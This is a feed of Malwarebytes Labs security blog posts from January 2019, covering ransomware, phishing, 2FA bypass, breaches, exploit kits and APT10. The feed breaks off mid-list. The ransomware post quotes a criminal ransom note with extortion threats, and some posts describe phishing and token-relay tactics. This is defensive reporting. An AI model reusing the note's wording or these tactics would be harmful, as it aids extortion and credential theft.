Techie Feeds

Sly criminals package ransomware with malicious ransom note

Malwarebytes - Fri, 01/25/2019 - 18:00

Ransomware continues to show signs of evolution. From a simple screen locker to a highly-sophisticated data locker, ransomware has now become a mainstream name, even if (historically), it has been around far longer than we want to look back.

Although the criminals behind ransomware campaigns are observed to be refining their approaches—from the “spray and pray” tactic to something akin to wide beam laser precision—they are also fine-tuning their targets. They can single out organizations, companies, and industries; and they can also hold cities and towns for ransom.

Ransomware has also stepped up in sophistication. Criminals have begun introducing certain forms of hybridization in their attacks, either the ransomware file itself is given capabilities outside of its type (e.g., VirRansom and Zcrypt variants that can infect files) or the entire campaign involves one or more threat vectors.

The latest in-the-wild ransomware strain discovered by a group of security researchers known as MalwareHunterTeam (MHT, for short) fits the latter.

Ransomware + phishing: a match made in heaven?

Nothing much is known about this ransomware—which some are already dubbing as CryTekk—apart from the way it applies a wily social engineering tactic to its ransom note, potentially to ensure a near 100 percent of affected parties acting on the infection and paying the ransom. The lure? An additional payment option for affected users who want to retrieve their files but don’t have a cryptocurrency wallet.

The ransom note. (Courtesy of MalwareHunterTeam)



Dear victim:

Files have been encrypted! And Your computer has been limited!

To unlock your PC you must pay with one of the payment methods provided, we regularly check your activity of your screen and to see if you have paid. Paypal automatically sends us a notification once you’ve paid, But if it doesn’t unlock your PC upon payment contact us (

 Reference Number: CT-{redacted}

When you pay via BTC, send us an email following your REF Number if your PC doesn’t unencrypt. Once you pay, Your PC will de decrypted. However if you don’t within 14 days we will continue to infect your PC and extract all your data and use it.

Google ‘how to buy/pay with bitcoin’ if you don’t know how. To pay by bitcoin: send $40 to your unique bitcoin address.


Clicking the yellow “Buy now” button in the small PayPal option box opens a browser tab to direct users to a phishing page asking for card details:

The first PayPal phishing page asking for card deets. (Courtesy of MalwareHunterTeam)

After supplying the information wanted and clicking the “Agree and Confirm” button, users are then directed to another phishing page asking for personal information, which they need to fill in to “confirm” their identities:

The second PayPal phishing page asking for personally identifiable information (PII). (Courtesy of MalwareHunterTeam)

After filling in all information, clicking the “Agree and Confirm” button points users to a fake confirmation that the user’s account access is fully restored, which is odd because, as far as the user knows, they were paying the ransom, not addressing a problem about their PayPal accounts. Now, if the user hadn’t already realized that they had been duped twice, at this point they might.

The fake “confirmation” page. (Courtesy of MalwareHunterTeam)

Finally, clicking the “My PayPal” button directs users to the legitimate PayPal login page.

Fool me once, shame on me. Fool me twice…

While ransomware is not as rampant today compared to two years ago, it remains a top threat to consumers and businesses alike. It wouldn’t surprise us at all if the real intent of the criminals behind this campaign is to bank on people’s fear of ransomware to go after their money and credentials.

Files encrypted by this ransomware can be decrypted, as confirmed by MHT’s own Michael Gillespie in a tweet. In fact, within two hours after the initial MHT tweet, Gillespie already offered to decrypt files for possible victims. This confirms what Bleeping Computer stated about the ransomware code being “nothing special.” This also suggests that the criminals put greater effort into the phishing side of the campaign than to the ransomware itself.

Since most, if not all, ransomware attacks ask for cryptocurrency payment, this attack differentiates itself by offering victims an alternative pay first before presenting the Bitcoin payment option. This leads us to speculate that, although they didn’t say it outright, PayPal is their preferred payment method. Also, $40 in Bitcoin in exchange for decrypting files? That’s cheap compared to the amount criminals will be getting from victims once they access their accounts using the swiped credentials.

Regardless of whether we see this as a sophisticated ransomware campaign or a “really dope” attempt at phishing, one thing is clear: They are after your money and credentials, so it pays to know when you’re being phished.

It can be frightening to find oneself face-to-face with a ransomware infection, but let us remain calm and keep our heads together. Remember that criminals want us to feel vulnerable, so be and do the opposite. Scrutinize URLs carefully before you enter your credentials or PII. If you feel that something is amiss, follow your gut and don’t proceed any further. If you think you’re stuck and don’t know what to do next, don’t be afraid to ask for help from someone online or in-person who is savvy enough to guide you.

Stay safe out there!

The post Sly criminals package ransomware with malicious ransom note appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A user’s right to choose: Why Malwarebytes detects Potentially Unwanted Programs (PUPs)

Malwarebytes - Fri, 01/25/2019 - 16:00

Potentially Unwanted Programs (PUPs): the name says it all.

While the programs themselves might have legitimate uses, their vendors often use inappropriate methods to drive downloads or hide within a program bundle. At Malwarebytes, we feel we have an obligation to help protect our customers from PUPs by identifying and detecting them and giving the user the right to choose whether they continue using their services.

It’s worth noting that PUP vendors are unhappy when we detect them. Several, including Enigma, have sued us over the detections. Litigation hasn’t deterred us from continuing to flag software that meets our PUP criteria. Fortunately, a federal court in California agreed that customers should have the ability to decide which software runs on their computers and dismissed Enigma’s initial claims. A copy of the Court’s order dismissing Enigma’s case (Case 5:17-cv-02915-EJD Document 105) may be found online at our press center.

These disputes do not impact the application of our criteria for PUP detections. We continue to identify two Enigma applications: SpyHunter 4 and RegHunter as PUPs. But another release, SpyHunter 5 changed the application behavior to no longer fit into our PUP criteria. We applaud Enigma for the modifications and hope it’s a permanent change.

We will continue to evaluate software against our guidelines to give our customers the tools to make an informed choice about the software running on their computers. We prefer to give each individual the right to manage their devices. We enable consumers who want PUPs to control that choice while protecting the vast majority of our customers by keeping those programs on our PUP list. We think this is the best possible path for our company and our customers.

Stay safe everyone!

The post A user’s right to choose: Why Malwarebytes detects Potentially Unwanted Programs (PUPs) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

2019 State of Malware report: Trojans and cryptominers dominate threat landscape

Malwarebytes - Wed, 01/23/2019 - 08:01

Each quarter, the Malwarebytes Labs team gathers to share intel, statistics, and analysis of the tactics and techniques made popular by cybercriminals over the previous three months. At the end of the year, we synthesize this data into one all-encompassing report—the State of Malware report—that aims to follow the most important threats, distribution methods, and other trends that shaped the threat landscape.

Our 2019 State of Malware report is here, and it’s a doozy.

In our research, which covers January to November 2018 and compares it against the previous period in 2017, we found that two major malware categories dominated the scene, with cryptominers positively drenching users at the back end of 2017 and into the first half of 2018, and information-stealers in the form of Trojans taking over for the second half of the year.

But that’s not all we discovered.

The 2019 State of Malware report follows the top 10 global threats for consumers and businesses, as well as top threats by region and by corporate industry verticals. In addition, we followed noteworthy distribution techniques for the year, as well as popular scams. Some of our findings include:

  • In 2018, we saw a shift in ransomware attack techniques from malvertising and exploits that deliver ransomware as a payload to targeted, manual attacks. The shotgun approach was replaced with brute force, as witnessed in the most successful SamSam campaigns of the year.
  • Malware authors pivoted in the second half of 2018 to target organizations over consumers, recognizing that the bigger payoff was in making victims out of businesses instead of individuals. Overall business detections of malware rose significantly over the last year—79 percent to be exact—and primarily due to the increase in backdoors, miners, spyware, and information stealers.

  • The fallout from the ShadowBrokers’ leak of NSA exploits in 2017 continued, as cybercriminals used SMB vulnerabilities EternalBlue and EternalRomance to spread dangerous and sophisticated Trojans, such as Emotet and TrickBot. In fact, information stealers were the top consumer and business threat in 2018, as well as the top regional threat for North America, Latin America, and Europe, the Middle East, and Africa (EMEA).

Finally, our Labs team stared into its crystal ball and predicted top trends for 2019. Of particular note are the following:

  • Attacks designed to avoid detection, like soundloggers, will slip into the wild.

  • Artificial Intelligence will be used in the creation of malicious executables.

  • Movements such as Bring Your Own Security (BYOS) to work will grow as trust declines.

  • IoT botnets will come to a device near you.

To learn more about top threats and trends in 2018 and our predictions for 2019, download our report from the link below.

2019 State of Malware Report

The post 2019 State of Malware report: Trojans and cryptominers dominate threat landscape appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Browser push notifications: a feature asking to be abused

Malwarebytes - Tue, 01/22/2019 - 18:03

“I’m seeing a lot of ads popping up in the corner of my screen, and the Malwarebytes scan does not show there is anything wrong. It says my computer is clean. So what’s happening?”

Our support team runs into questions like this regularly, but the volume seems to be increasing lately. In most of these cases, it helps to look at the “Notification permissions” of the browser displaying this annoying behavior. A good cleansing in that department might be just what you need to get rid of those “pop-ups.”

The problem is that the messages users are seeing are not pop-ups at all, but in fact “push notifications,” often referred to as simply “notifications.” We understand that naming them differently doesn’t make them any less annoying. But it does change our classification of such messages.

Some notifications are not simple advertisements, but rather misleading messages about the safety of your computer.

What are these notifications?

From the Mozilla Developer pages:

The Notifications API lets a web page or app send notifications that are displayed outside the page at the system level; this lets web apps send information to a user even if the application is idle or in the background. This article looks at the basics of using this API in your own apps.

What we can learn from this is that the notifications can originate from a website or from an app. We are going to focus on the case where a website is causing the problem. Any app showing you commercial messages outside of a browser window would get detected as adware by Malwarebytes, so these would not escape a scan.

However, website notifications can be displayed outside the browser window. Wait, what’s the difference between notifications and pop-ups again? A pop-up is a new browser window or tab, whereas notifications are more like tooltips. They are messages that are independent from any open websites.

Notifications show the domain from which they originate, so that could clue you in on the answer to another important question, which is:

How did I get them?

To receive browser notifications, a user must have first allowed them. In Firefox, the dialog to allow them looks like this:

While that seems pretty straightforward, there are trickier sites that use a bit of social engineering to get you to allow their notifications.

The website visitors are led to believe that they have to click “Allow“ to see the video. In fact, if they click the “Allow” button, they will be redirected to another website, sometimes asking yet again to allow notifications, but meanwhile their clicking has allowed this site to show them notifications. And, mind you, the site does not have to be open in the browser for the notifications to pop up. As you can see, the fact that you are allowing notifications is a bit less clear in the Chrome prompt than it is in Firefox.

How do I disable them?

There are some options for disabling notifications. You can disable them altogether or you can disable notifications for specific domains, by removing them from your “Allow” list. You can even add them to your “Blocked” list.

For every browser, the notifications look slightly different and the methods to disable them are slightly different as well. To make them easier to find, I have split them up by browser.


To completely turn off notifications, even from an extension:

  • Click the three dots button in the upper right-hand corner of the Chrome menu to enter the Settings menu.
  • Scroll down in the Settings menu and click on Advanced.
  • Under Privacy and Security, select Content settings.
  • In this menu, select Notifications.
  • By default, the slider is set to Ask before sending (recommended), but feel free to move it to Block if you wish to block notifications completely.

For more granular control, you can use this menu to manipulate the individual items. Note that the items with a jigsaw puzzle piece are enforced by an extension, so you would have to figure out which extension first and then remove it. But for the ones with the three dots behind them, you can click on the dots to open this context menu:

Selecting Block will move the item to the block list. Selecting Remove will delete the item from the list. It will ask permission to show notifications again if you visit their site (unless you have set the slider to Block).

Shortcut: another way to get into the Notifications menu shown earlier is to click on the gear icon in the notifications themselves.

This will take you directly to the itemized list.


To completely turn of notifications in Firefox:

  • Click the three horizontal bars in the upper right-hand corner of the menu bar and select Options in the settings menu.
  • On the left-hand side, select Privacy & Security.
  • Scroll down to the Permissions section and click on the Settings button behind Notifications.

  • In the resulting menu, put a checkmark in the Block new requests asking to allow notifications box at the bottom.

In the same menu, you can apply a more granular control by setting listed items to Block or Allow by using the drop-down menu behind each item.


Where push notifications are concerned, you can see how closely related Opera and Chrome are.

  • Open the menu by clicking the O in the upper left-hand corner.
  • Click on Settings (on Windows)/Preferences (on Mac).
  • Click on Advanced and select Privacy & security.
  • Under Content settings (desktop)/Site settings (Android,) select Notifications.

On Android, you can remove all the items at once or one by one. On desktops, it works exactly the same as it does in Chrome. The same is true for accessing the menu from the notifications themselves. Click the gear icon in the notification, and you will be taken to the Notifications menu.


To disable web notifications in Windows:

  • Click the Start button in Windows (Windows icon).
  • Select Settings (gear icon).
  • Select System.
  • Select Notifications & actions.
  • Scroll down and select Microsoft Edge in the list of senders.
  • Here, you set the switch for Notifications to Off or change the notification properties.

You can also manage the notifications on a site-by-site basis in Edge:

  • Click the three dots button in the top-right corner and select Settings.
  • Scroll down and click on View advanced settings.
  • Under Notifications, click on Manage.
  • Here, you can switch notifications off for a specific website.

Launch Safari and go to Safari > Preferences, or press Command-Comma. Click on the Notifications tab. From there, you can manually disable/enable notifications from select sites, remove all notifications, or access your system-wide Notification Preferences.

Are these notifications useful at all?

While we could conceive of some cases where push notifications might be found useful, we would certainly not hold it against you if you decided to disable them altogether.

Web push notifications are not just there to disturb Windows users. Android, Chromebook, MacOS, even Linux users may see them if they use one of the participating browsers: Chrome, Firefox, Opera, Edge, and Safari. In some cases, the browser does not even have to be opened, and it can still display push notifications.

Be careful out there and think twice before you click “Allow.”

The post Browser push notifications: a feature asking to be abused appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (January 14 – 20)

Malwarebytes - Mon, 01/21/2019 - 16:48

Last week on the Malwarebytes Labs blog, we took a look at how the government shutdown is influencing cybersecurity jobs, Advanced Persistent Threats group APT10, the comeback of Fallout EK, the hosting of malicious sites on legitimate servers, and the Collection 1 data breach.

Other cybersecurity news
  • New Zealand-based cryptocurrency exchange Cryptopia has gone offline after suffering a security breach, which resulted in significant losses. Cryptonia has notified and involved relevant government agencies, including the New Zealand police and the High-Tech Crimes Unit. (Source: Coindesk)
  • A former employee of a British company pleaded guilty to one count of gaining unauthorised access to a network with intent to commit further offences, and one count of committing unauthorised acts with the intent to impair the operation of a computer within a network. The employee was ordered to pay £20,000 compensation. (Source: Leamington Observer)
  • A California judge has ruled that American cops can’t force people to unlock a mobile phone with their face or finger. The ruling further protects people’s private lives from government searches, and is being hailed as a potentially landmark decision. (Source: Forbes)
  • The Oregon State Department of Administrative Services’ (DAS) Office of the State Chief Information Officer overpaid for services by between $400 million and $1.6 billion during the 2015 to 2017 timeframe, according to an audit by the Oregon Secretary of State Audit Division that looked at $8 billion of spending. (Source: CioDive)
  • The recent Windows security patch CVE-2019-0543 has introduced a breaking change for a PowerShell remoting scenario. It is a narrowly-scoped scenario that should have low impact for most users, as the breaking change only affects local loopback remoting. (Source: PowerShell Team Blog)
  • The Iceman cometh, his smartwatch told the cops: Hitman jailed after gizmo links him to Brit gangland slayings. Avid runner and hitman Mark Fellows was this week found guilty of murder after being grassed up by his Garmin watch. (Source: The Register)
  • Security flaws were discovered in ThreadX, a real-time operating system (RTOS) developed by Express Logic. The vendor claims on their website that ThreadX has over 6.2 billion deployments, being one of the most popular software-powering Wi-Fi chips. (Source: BleepingComputer)
  • Decrypted Telegram bot chatter was found to actually be a new Windows malware, dubbed GoodSender, which uses the messenger platform to listen and wait for commands. The attacker can use Telegram to communicate with the malware and send HTTPS-protected instructions. (Source: SC Media)
  • A Fortnite security flaw could have exposed players’ accounts. Security researchers found vulnerabilities on Epic’s site that could have let hackers access accounts. They were able to listen to Fortnite squad members speaking with each other and could have bought V-Bucks virtual currency using players’ stored credit card details. (Source: Engadget)
  • Pranks and challenges have always been popular on YouTube, but now the Google-owned company has set stricter guidelines for such content. A new YouTube support page provides details for a ban on pranks and challenges that cause immediate or lasting physical or emotional harm. (Source: ArsTechnica)

Stay safe, everyone!

The post A week in security (January 14 – 20) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Has two-factor authentication been defeated? A spotlight on 2FA’s latest challenge

Malwarebytes - Mon, 01/21/2019 - 16:15

Multiple news reports about the defeat of two-factor authentication (2FA) have been making rounds lately.

In November 2018, our friends at ESET discovered a purported Android battery utility tool called “Optimization Android” from a third-party app store. This app was designed to steal money from a user’s PayPal account without relying on stolen credentials. It operates by modifying a device’s Accessibility settings and enabling the use of Android’s overlay accessibility feature. This then allows a malicious accessibility service to mimic the user’s clicks to access the legitimate app and wire money to the criminal’s own PayPal address.

Long story short: This method effectively bypasses 2FA.

Then in mid-December, researchers at the Computer Emergency Response Team in Farsi (CERTFA) Lab released a report about “The Return of Charming Kitten,” a fresh slew of state-backed phishing attacks on individuals involved in sanctions against Iran and others, but focusing more on people based in the United States and Israel. State actors have found a way to fool targets into giving away their Gmail and Yahoo! 2-step verification codes.

Days after CERTFA’s report, Amnesty International broke the news that broad, targeted phishing campaigns were set against thousands of human rights defenders (HRDs), journalists, and political actors in countries throughout the Middle East and Northern Africa (MENA). The threat actors behind at least one campaign had also actively and deliberately taken steps to bypass common forms of 2FA.

A mantis lies in wait

The latest means to circumvent 2FA was made public by Polish security researcher Piotr Duszyński not long after the New Year. He called it Modlishka—the English pronunciation of the Polish word ‘mantis’—and described it as “a flexible and powerful reverse proxy that will take your phishing campaigns to the next level (with minimal effort required from your side).” It was a tool to aid penetration testers in conducting legitimate tests.

With its release, Duszyński emphasized the effectiveness and seriousness of social engineering attacks. In the wrong hands, a tool like Modlishka can be misused to create a compelling and sophisticated phishing campaign that is significantly easier to use but far more difficult to detect and avoid by users.

Overview of collected information from a simulated phishing campaign (Courtesy of Piotr Duszyński)

How Modlishka works

Modlishka sits between the legitimate website it is impersonating and the phishing website the user is seeing.

For this tool to successfully do its job—and, in turn, for the campaign to work—phishing campaign operators must first make their targets believe that they are on the website they expect to be on so that victims will enter their credentials without suspicion. Any interactions the user makes within the phishing page, including entering credentials, are passed through and recorded by Modlishka first before forwarding them to the legitimate website in real time.

This tool also prompts the user for tokens when their accounts have 2FA enabled. However, the phisher should be present to intercept the 2FA token—especially if it’s a time-based, one-time password (TOTP)—from the user and manually input it to the legitimate website themselves before it expires.

Assuming everything went smoothly, the user is then redirected to the legitimate website and successfully logged in to conclude the phishing attack. Below is a video of Modlishka in action.

Courtesy of Piotr Duszyński

How users can protect themselves

To stop Modlishka dead in its tracks, Duszyński advised the use of 2FA hardware tokens, such as Yubikey, RSA SecurID, and the Titan Security Key, that support the Universal 2nd Factor (U2F) standard. According to Matias Brutti, Director of Research and Exploitation at Okta, Push authentication can also render such campaigns less effective.

Since all the incidents we mentioned here are all phishing attempts, it still pays to know what to look out for when determining whether a website, email, text, or other communication is a phish. Never click unknown links without verifying their authenticity first. Always check the URLs in the address bar—and remember, the green padlock is no longer enough to identify whether a site is safe or not.

Furthermore, users might drop the use of SMS 2FA and opt for a stronger second form of authentication, such as an authentication app or biometrics. Make it a point to regularly review account access logs to check if someone other than yourself is attempting to gain entry to your online accounts. Avoid conducting business, especially that involving the exchange of sensitive information or documents, using your personal email. And if you can, put additional encryption in your messages by using Pretty Good Privacy (PGP). Lastly, use password managers—they not only have better memories than their humans, but they also keep you away from phishing sites by checking the URLs on the address bar before auto-populating fields.

For mobile users, avoid downloading apps from third-party stores. Better yet, avoid looking for app utilities you think will optimize your mobile device. For example, if you’re looking to extend battery life, don’t download an app. Adopt some simple steps, such as turning off GPS when you’re not using it, or using the phone in battery-saver mode.

2FA is still good to have

Adopting 2FA is well-known, popular cybersecurity advice we give to those who want to beef up the security—and consequently, the privacy—of their accounts. But it’s also a known fact that 2FA is not bulletproof, hack-proof, or the cybersecurity panacea many assume it to be.

It is true that some forms, such as SMS-based OPTs, are a lot easier to circumvent than others. It is also true that there are more than 10 known ways to defeat 2FA to date. However, this doesn’t mean that 2FA itself is broken. Using 2FA is still far better than having just a user name and password locking your account.

The defeat of certain forms of 2FA isn’t a call for total abandonment nor should it be considered as one. It signals us, the users, to explore and go for better, more advanced forms of 2FA in securing our accounts. It also forces us to re-think our habits, adapt accordingly to this change in the threat landscape, and continue to learn about the latest social engineering tactics and tricks that could target us in the environments and sites we frequent.

Stay safe!

Additional reading:

The post Has two-factor authentication been defeated? A spotlight on 2FA’s latest challenge appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Collection 1 data breach: what you need to know

Malwarebytes - Fri, 01/18/2019 - 18:33

Yesterday, news broke that the largest data dump in history had been discovered, with more than 770 million people’s Personally Identifiable Information (PII) decrypted, catalogued, and up for grabs on the Internet. The files, which are being dubbed Collection 1, were originally found on cloud service MEGA, and later posted to a popular hacking forum.

The Collection 1 folder contains more than 12,000 files and is a whopping 87 gigabytes large.

While on paper this sounds beyond alarming, the truth is much more nuanced. The collection is composed of data pulled together from multiple breaches and leaks, many of which contain email addresses and passwords that are at least two to three years old. Security researcher Brian Krebs cautioned folks on assigning too much significance to the find because the data is rather stale, and not particularly useful for threat actors.

However, as we saw in summer 2018, stale data can be used successfully in phishing and extortion campaigns. The mere mention of a correct password, even if it’s outdated, could coax unsuspecting users into giving up fresh PII or paying ransoms.

Every time an organization announces that it’s been breached, customers wait with bated breath to see if they’ve been impacted. But after a time, if an identity theft crisis, credit card tampering, or straight-up hack doesn’t take place, many users breathe a sigh of relief and imagine they’ve weathered the storm. Yet, as evidenced by Collection 1 and other such treasure troves of data that are offered for sale online, that may not be the end of it. If users don’t take steps to protect or change their credentials after a breach, they are at risk of being targeted again and again.

Our advice to users: Take a look to see if your information is caught up in this latest data dump. You can easily check to see if you’ve been compromised by using researcher Troy Hunt’s website Have I Been Pwned. Once there, enter your email address and scroll to the bottom of the page to see if you are part of Collection 1 or any other breaches. In addition, you can check if your password was compromised using a new feature of Hunt’s site called Pwned Passwords.

If you are on any of these lists, go forth and change your passwords immediately. We also recommend using a password manager and following other password best practices, such as avoiding using the same password across multiple sites and using long phrases that do not contain obvious dates, names, or other easily identifiable (and thus crackable) information.

No, this may not have been the breach to end all breaches. But that doesn’t mean it should be taken lightly. In fact, this is an opportunity for 770 million people to shore up their defenses by making a simple, yet effective, change.

As always: Stay safe, everyone!

The post Collection 1 data breach: what you need to know appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hosting malicious sites on legitimate servers: How do threat actors get away with it?

Malwarebytes - Fri, 01/18/2019 - 16:00

How do threat actors manage to get their sites and files hosted on legitimate providers’ servers? I have asked myself this question many times, and many times thought, “The threat actors pay for it, and for some companies, money is all that matters.”

But is it really that simple? I decided to find out.

I asked some companies, as well as some of my co-workers who are involved with site takedowns on a regular basis, about their experiences.

I conversed with William Tsing who is, among others, responsible for infringements on the Malwarebytes brand; Steven Burn, our Website Protection Team Lead; and with a spokesperson of International Card Services B.V. (ICS), the company behind the well-known Visa and Mastercard credit cards. I also sent inquiries to some international banks, but as of presstime, they have not replied. On the receiving end of takedown requests, I queried providers about their methods and motives.

Background for the investigation

To give you some background on why we are involved in take-downs: Even though we protect our customers by adding malicious domains and IPs to our block lists, we also report those sites and try to get them taken offline. This does not always result in a successful takedown, but if there is a chance to protect everyone against malicious sites (and not just our clients), we will always grab the opportunity.

Let’s look at this problem from a few angles, starting with the initiators of takedowns.

Protecting your brand and your customers

Imposters can give your company an undeserved bad reputation and cause financial damages. Many financial companies are held responsible for losses due to phishing mails and fake copies of their websites. So they are generally well organized when it comes to dealing with abuse complaints. In the financial sector, one of the biggest problems is phishing mails linking to imitation sites. These imitations can be convincing, complete with green padlocks and ironic warnings about phishing.

Financial corporations in general and banks in particular are well prepared for abuse cases. Most of them have the following in place:

  • Educational pages on their site about how to recognize and deal with phishing attempts.
  • Help yourself instructions about what to do if you clicked on a link or entered your credentials on a fake site.
  • An abuse email address where customers and researchers can forward phishing mails and where you can report fake sites.
  • An abuse department that is constantly fighting to get sites taken offline that are targeting their brand(s).

The spokesperson for ICS let us know that they always attempt to take down malicious sites and are successful in about 300 cases per month, globally. In their experience, most providers are quick to take action, but sometimes differing time zones and office hours drag on the process longer than necessary.

At Malwarebytes, we also have to deal with imposters, some of which are selling our free product and others who are tech support scammers pretending to be our support department. William Tsing has had a few of these guys for breakfast, but there are some cases where it is frustrating to have fraudulent content removed. Some of our grievances are:

  • Dealing with automated bots that are impossible to convince there is something fraudulent going on.
  • No response from the provider at all.
  • A culture that would rather receives complaint about the content than from disgruntled customers who had their content removed—no matter what that content is.

This provider apparently knows what should be removed.

Hosting and other providers

As mentioned earlier, we also sent some inquiries to hosting companies and, this may not come as a surprise: the companies that actually do act upon takedown requests were the only ones that responded. The rest decided to deal with my request for information in the same way they would with a takedown request—they ignored it.

According to Steven Burn, who is responsible for the Malwarebytes block lists, this is typical behavior. In his experience, however, Western European and North American hosting companies are usually a lot more cooperative than Russian and Chinese providers.

We have asked these hosting companies what they consider malicious content, and the ones that responded agreed on the following reasons for taking sites offline:

  • Phishing content
  • Hacking content
  • Malware (as downloads)
  • Spamming

Some others also specified:

  • Illegal software and cracks
  • Inappropriate content

These providers all estimated the time between receiving a complaint and fixing the problem to be well under eight working hours. I know from experience that most are even faster. We also know that the ones that didn’t respond are more likely to deal with requests from big companies faster than those of researchers, or as they put it,” unrelated third parties.” And some may not respond at all, or worse, have an automated bot send you responses that drive you up the wall or into despair.


There are other providers at play when it comes to malicious sites. Take, for example, URL-shorteners. URL shortening services are often used by cybercriminals to obfuscate redirects to malicious destinations. So, if you’re unable to get the website itself removed because the hosting provider is unresponsive, you can try to get the URL-shortener to remove the shortened link from their redirections list. In some cases where the threat actor spread the link only in the shortened form, this could be just as effective. Most of these URL-shortening services provide excellent support, as well as detailed instructions on their site on how to proceed.


A domain name registrar is a company that manages the reservation of Internet domain names. In the chain of hosting malicious websites, they are at least as important as the company providing the physical server. A registrar can stop DNS requests for a domain to end up at the correct server. A registrar is also the player that has to enable threat actors when they use techniques like Domain Generating Algorithms (DGA). If the threat actor is unable to automatically register the domains generated by the algorithm, the entire setup of the DGA fails. Sometimes the registrar and the hosting company are the same, but this is not always the case.

Server scans

Another question I asked the providers is whether they perform scans of their servers for inactive malware or for malicious sites. Inactive malware on a server could indicate that a website is hosting malware for download. Hosted malware can be used as a payload for downloader Trojans, or it could be offered for download under the smokescreen of pretending to be a legitimate file. The providers responded that their servers are protected, but not by security software that scans for inactive malware. One provider, however, indicated that they scan newly-created sites for signs that the site could be used for malicious purposes in order to proactively set them offline.

Security researchers

Many security researchers will report their findings to interested parties. How effective they are seems to depend on how well they are connected. This is unfortunate, as requests from relatively unknown researchers can be just as legitimate as those from longtime players. Our belief is that every complaint should be taken seriously, whether it was sent to the general abuse email address or to the head of the department; whether it comes from a finance company, an antivirus vendor, or an independent botnet researcher.

Our experience with providers varies so widely that it’s hard to give general guidance. There is a provider that lets Steven Burn take sites offline himself and asks questions later. There was a provider that kept getting abused by tech support scammers, but when I pointed it out to them, they sought and found a common property in all the accounts that the threat actors registered with them. By doing so, they were able to root out all the scammers’ sites, even the ones that hadn’t been published yet. These are some examples of the ways in which we could work together to make the Internet a safer place.

But if you are a researcher or work in an abuse department, you also know the other end of the spectrum. I’m talking about the providers that would sell their grandfather for a buck or the social media giants that get so many complaints, it takes months just to get past the automated responses.

The answer to my question

In an ideal world, threat actors would have to use their own servers to host malicious sites. This would make it a lot easier for law enforcement to find out who they are and put them where they belong. Talking to some of the people that have to deal with this problem on a daily basis has more or less confirmed what I already suspected: the underlying problem for the hosting of malicious sites is about money. However, it’s perhaps a bit more nuanced than I originally believed. My revision to my original answer, then would be that two issues are at play:

  • The provider does not care where the money comes from, or how the site will be used to make more money.
  • The provider has not prioritized spending money on a functioning abuse department.

Is there anything we can do to change these attitudes? There is one way to get providers to sit up and listen. When we host our own sites, we can ask ourselves which type of provider we would rather do business with: one that takes abuse seriously, or one that turns a blind eye to cybercrime? If negligent practices turn into profit losses, it’s likely these hosting companies will take takedown requests more seriously.

Waiting for legislation that holds providers partly responsible for the content they are hosting could take a long time—or it may not even happen in some countries. It’s best, then, to take matters into your own hands. If you see something, say something. And if you own your own website now or plan to launch one in the future, look into the business practices of those hosting companies and invest in those that are taking Internet safety seriously.

Do you have takedown experiences of your own to share? Have you ever reported a malicious site to a provider? Sound off in the comments section.

The post Hosting malicious sites on legitimate servers: How do threat actors get away with it? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Improved Fallout EK comes back after short hiatus

Malwarebytes - Thu, 01/17/2019 - 19:51

After a short hiatus in early January, the Fallout exploit kit is back in business again with some new features for the new year. During its absence, we noticed an increase in RIG EK campaigns, perhaps to fill that temporary void.

Fallout EK is distributed via malvertising chains (one of them we track under the name HookAds), especially through adult traffic. Since January 15, Fallout EK activity has been picking up pace again to deliver the GandCrab ransomware.

The revised Fallout EK boasts several new features, including integration of the most recent Flash Player exploit. Security researcher Kafeine identified that Fallout is now the second exploit kit to add CVE-2018-15982.

Fallout EK 2019 highlights:
  • HTTPS support
  • New landing page format
  • New Flash exploit (CVE-2018-15982)
  • Powershell to run payload

One aspect that caught our attention was how Fallout was delivering its payload via Powershell rather than using iexplore.exe. This was also mentioned in the EK developer’s advert reposted by Kafeine on his site.

The Base64 encoded Powershell command calls out the payload URL and loads it in its own way:

This technique is most likely an attempt at evasion, as traditionally we’d expect the Internet Explorer process to drop the payload.

What this new development tells us is that exploit kit developers are still monitoring the scene for new exploits and techniques. In 2018, several zero-days for Internet Explorer and Flash Player were found and turned into easily adaptable proof of concepts. Even though the market share for IE and Flash continues to drop, there are many countries still running older systems where the default browser is Internet Explorer. Therefore, threat actors will take advantage.

Malwarebytes users are already protected against this updated Fallout EK.

Indicators of Compromise 185.56.233[.]186,advancedfeed[.]pro,HookAds Campaign 51.15.35[.]154,payformyattention[.]site,Fallout EK

The post Improved Fallout EK comes back after short hiatus appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The Advanced Persistent Threat files: APT10

Malwarebytes - Wed, 01/16/2019 - 17:00

We’ve heard a lot about Advanced Persistent Threats (APTs) over the past few years. As a refresher, APTs are prolonged, aimed attacks on specific targets with the intention to compromise their systems and gain information from or about that target. While the targets may be anyone or anything—a person, business, or other organization—APTs are often associated with government or military operations, as they tend to be the organizations with the resources necessary to conduct such an attack. Starting with Mandiant’s APT1 report in 2013, there’s been a continuous stream of exposure of nation-state hacking at scale.

Cybersecurity companies have gotten relatively good at observing and analyzing the tools and tactics of nation-state threat actors; they’re less good at placing these actions in context sufficient enough for defenders to make solid risk assessments. So we’re going to take a look at a few APT groups from a broader perspective and see how they fit into the larger threat landscape.

Today, we’re beginning with APT10. (Note: These groups have a panoply of different names, but for simplicity’s sake, we’re going to borrow Mandiant’s naming conventions for Chinese groups.)

Who is APT10?

First observed in 2009, APT10 is most commonly attributed via open source research to the Chinese Ministry of State Security (MSS). MSS attacks are typically, but not limited to: intelligence targets surrounding trade negotiations, research and development in competition with Chinese commercial entities, and high value counter intelligence targets overseas. As an example of a trade negotiation op, Fidelis Security observed a watering hole attack in February 2017 targeting members of the National Foreign Trade Council, a US trade lobby group.

A commonly-used tool of APT10 is Scanbox, which is a form of malware that can offer insights into their targeting priorities. Scanbox has been observed on assorted industrial sector targets in the US and Japan, but also on Uighur dissidents overseas. While this supports the thesis of APT10 being a government threat group, we caution defenders against associating any one piece of malware exclusively with one group. Countries maintain multiple threat groups, all of whom are fully capable of collaborating and sharing TTPs.

Malware commonly deployed

APT10 is known for deploying the following malware:

